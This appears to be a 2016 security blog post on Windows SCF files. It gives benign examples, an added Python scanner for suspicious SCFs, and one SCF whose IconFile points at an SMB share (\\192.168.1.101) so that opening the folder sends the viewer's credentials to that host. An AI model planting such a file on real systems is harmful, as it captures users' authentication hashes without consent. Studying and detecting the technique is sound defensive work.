SMB/HTTP Auth Capture via SCF File
Published: 14 Jun 2016 - 07:35 -0500
Recently saw a link to an SCF file. Didn’t know what those were, so I went digging. Turns out they are a simple text-based file that controls Windows Explorer. ;-)
Here are the examples I found via the references:
[Shell]
Command = 2
IconFile = explorer.exe, 1
[Taskbar]
Command = Explorer
Open “Channels” page in IE:
[Shell]
Command=3
IconFile=shdocvw.dll,-118
[IE]
Command=Channels
This didn’t work for me at all, probably because Internet Explorer doesn’t have “Channels” anymore.
Minimize all windows:
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
My first attempt to utilize this file format for fun was of course to just set the IconFile to an SMB share:
[Shell]
Command=2
IconFile=\\192.168.1.101\share\test.ico
[Taskbar]
Command=ToggleDesktop
and that worked as expected: every time someone opened the folder containing the SCF file, their machine automatically attempted to authenticate to the share I specified. Lots easier than writing an LNK file.
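For the defensive side of this, the behaviour above gives a simple thing to hunt for on file shares: an SCF whose IconFile points at a UNC path rather than a local file. The following is an added example (not code from the original post) that parses SCF text, tolerating the spacing and ",index" variants shown above, and flags files whose icon would cause an outbound SMB authentication. The sample file contents are constructed for the example.

```python
import re
from typing import Optional

# Constructed sample SCF contents (assumptions for this example, not captured
# from real files): a benign "minimize all windows" shortcut and one whose
# IconFile points at a UNC share, as described in the post.
BENIGN_SCF = "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n[Taskbar]\nCommand=ToggleDesktop\n"
UNC_SCF = "[Shell]\nCommand=2\nIconFile=\\\\192.168.1.101\\share\\test.ico\n[Taskbar]\nCommand=ToggleDesktop\n"


def parse_scf(text: str) -> dict:
    """Parse SCF/INI text into {section: {key: value}}, tolerating spaces around '='."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((';', '#')):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif '=' in line and current is not None:
            key, _, value = line.partition('=')
            sections[current][key.strip().lower()] = value.strip()
    return sections


def icon_target(text: str) -> Optional[str]:
    """Return the [Shell] IconFile path with any trailing ',index' removed, or None."""
    value = parse_scf(text).get('shell', {}).get('iconfile')
    if value is None:
        return None
    # An icon reference may end in ",<index>" (e.g. explorer.exe,3 or shdocvw.dll,-118).
    return re.sub(r',\s*-?\d+\s*$', '', value)


# Matches a UNC prefix: two backslashes, a host, then a backslash (\\host\share...).
UNC_RE = re.compile(r'^\\\\[^\\]+\\')


def is_remote_icon(text: str) -> bool:
    """True when the SCF's IconFile points at a UNC share, i.e. would trigger SMB auth."""
    target = icon_target(text)
    return bool(target) and UNC_RE.match(target) is not None


def scan(files: dict) -> list:
    """Given {filename: contents}, return the names of SCF files with a remote icon."""
    return [name for name, body in files.items() if is_remote_icon(body)]


if __name__ == '__main__':
    print(scan({'ok.scf': BENIGN_SCF, 'suspicious.scf': UNC_SCF}))  # ['suspicious.scf']
```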
My gut is telling me there is more to this file format than meets the eye, especially when there are malware writers using it as well. I haven’t been able to get my hands on one to see what they are doing inside the file, but I assume it’s not just to minimize all windows.
There are some hints that you can invoke COM objects... who knows.